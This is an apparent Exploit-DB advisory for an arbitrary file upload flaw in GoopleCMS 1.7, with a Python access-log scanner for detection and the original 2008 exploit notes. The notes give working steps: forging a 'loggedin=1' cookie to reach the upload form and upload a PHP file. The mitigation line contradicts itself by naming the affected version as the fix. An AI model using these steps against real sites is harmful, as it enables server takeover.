Remote File Upload
Vendor: GoopleCMS
By: BeyazKurt
CVSS: 7.5 (HIGH)
CWE: 434
Product Name: GoopleCMS
Affected Version From: 1.7
Affected Version To: 1.7
Patch Exists: YES
Related CWE: N/A
CPE: a:gooplecms:goople_cms:1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2008

Goople Cms (1.7)

A vulnerability exists in Goople Cms (1.7) which allows an attacker to upload arbitrary files to the server. An attacker can exploit this vulnerability by setting the 'loggedin' cookie to '1' and then uploading a malicious file to the server. The uploaded file can then be accessed at http://SITE/user/doc/FILE.

Mitigation:

Upgrade to the latest version of Goople Cms (1.7)
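
Detection example (added here, not part of the original advisory or of GoopleCMS): a scan of Apache combined-format access logs for uploads to /win/upload.php and for active content served from /user/doc/, the two paths named above. The extension list, severity labels and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths come from the advisory; the extension list and severities are assumptions.
UPLOAD_PATH = "/win/upload.php"
DOC_PREFIX = "/user/doc/"
ACTIVE_EXT = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar",
              ".html", ".htm", ".shtml")

# client, method, request target, status from an Apache combined-format line
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [23/Nov/2008:10:01:02 +0000] "GET /win/upload.php HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.7 - - [23/Nov/2008:10:01:40 +0000] "POST /win/upload.php HTTP/1.1" 200 640 "http://site.example/win/upload.php" "Mozilla/5.0"
203.0.113.7 - - [23/Nov/2008:10:02:05 +0000] "GET /user/doc/notes.php?x=1 HTTP/1.1" 200 95 "-" "Mozilla/5.0"
198.51.100.20 - - [23/Nov/2008:10:05:00 +0000] "GET /user/doc/manual.pdf HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.21 - - [23/Nov/2008:10:06:00 +0000] "POST /win/upload.php HTTP/1.1" 200 640 "-" "Mozilla/5.0"
198.51.100.22 - - [23/Nov/2008:10:07:00 +0000] "GET /user/doc/page.PHTML HTTP/1.1" 404 210 "-" "Mozilla/5.0"
"""


def scan(log_text):
    """Return (severity, client, path) findings in log order."""
    uploaders = set()   # clients seen POSTing to the upload form
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue    # not a combined-format request line
        client, method, target, status = m.groups()
        path = unquote(target.split("?", 1)[0])
        lowered = path.lower()
        if method == "POST" and lowered == UPLOAD_PATH:
            # The cookie is not in the access log, so every upload needs review.
            uploaders.add(client)
            findings.append(("review", client, path))
        elif (lowered.startswith(DOC_PREFIX) and lowered.endswith(ACTIVE_EXT)
              and status.startswith("2")):
            # Active content served from the upload directory; worse when the
            # same client uploaded earlier in the log.
            severity = "high" if client in uploaders else "medium"
            findings.append((severity, client, path))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding)
```
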

Exploit-DB raw data:

#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Goople Cms (1.7)
# Download : http://ovh.dl.sourceforge.net/sourceforge/gooplecms/GoopleCMS_1.7.rar
# 
# Exploit : 
# Open : http://SITE/win/upload.php
# javascript:document.cookie = "loggedin=1; path=/";
# Copy/paste and go and back and upload PHP/HTML etc.. file. (and screw my English :D )
# File : http://SITE/user/doc/FILE (or your select)
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#                       Rinia ShqiptaRe  :) 
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
#######################################################

# milw0rm.com [2008-11-23]